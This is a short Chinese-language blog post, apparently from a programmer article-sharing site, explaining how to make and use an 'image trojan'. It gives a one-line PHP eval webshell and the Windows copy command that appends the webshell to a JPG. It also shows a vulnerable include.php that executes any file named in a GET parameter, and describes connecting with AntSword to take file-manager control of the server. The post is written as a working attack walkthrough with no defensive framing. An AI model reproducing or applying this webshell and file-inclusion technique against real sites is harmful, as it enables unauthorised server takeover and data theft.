欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

一句话图片木马

程序员文章站 2022-05-27 13:39:35
...

一句话图片木马

一、准备图片木马
1、准备任意图片pho.jpg
2、准备木马文件hack.php

<?php @eval($_POST['hack']);?>

3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg

copy pho.jpg/b+hack.php/a hack.jpg

b二进制格式,a为ASCII

二、上传图片
一句话图片木马
三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行)
1、一句话图片木马
右键图片复制图片地址,找到图片木马具体位置(upload//4820200820225424.jpg)
2、访问include.php

<?php
$file = $_GET['file'];
include $file;
?>

可以看到,include.php引用参数file文件,并且都当成php文件执行,file=木马图片位置,这样图片内的php木马代码就可以得以解析
一句话图片木马
四、蚁剑连接
url地址指向文件包含漏洞的地址
一句话图片木马
右键文件管理拿到webshell
一句话图片木马